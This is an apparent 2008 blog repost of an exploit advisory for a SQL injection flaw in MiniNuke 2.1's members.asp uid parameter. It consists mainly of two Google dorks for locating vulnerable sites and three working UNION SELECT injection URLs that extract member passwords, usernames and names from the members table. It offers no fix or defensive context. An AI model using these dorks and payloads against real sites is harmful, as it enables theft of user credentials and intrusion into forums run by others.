Software, Internet, Networking, And Security Review :: Bug - MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability :: February

February 26, 2008

Bug - MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability

Filed under: System Security

# MiniNuke v2.1 forum SQL Injection

# AUTHOR : S@BUN

# HOME : http://www.milw0rm.com/author/1334

# MAİL : hackturkiye.hackturkiye@gmail.com

# DORK 1 : allinurl:”members.asp?action”
# DORK 2 : allinurl: “members.asp”uid

#EXAMPLE=

members.asp?action=member_details&uid=SQL (exploit)

#EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,
kul_adi,0,sifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1,1,1,1,1%20from%20members

#EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,
sifre,0,sifre,0,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20members

# S@BUN i AM NOT HACKER S@BUN

Comments »

The URI to TrackBack this entry is: http://blackraptor.blogsome.com/2008/02/26/bug-mininuke-21-membersasp-uid-remote-sql-injection-vulnerability/trackback/

No comments yet.

RSS feed for comments on this post.

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Software And Internet Blog

February 26, 2008

Bug - MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability

Comments »

Leave a comment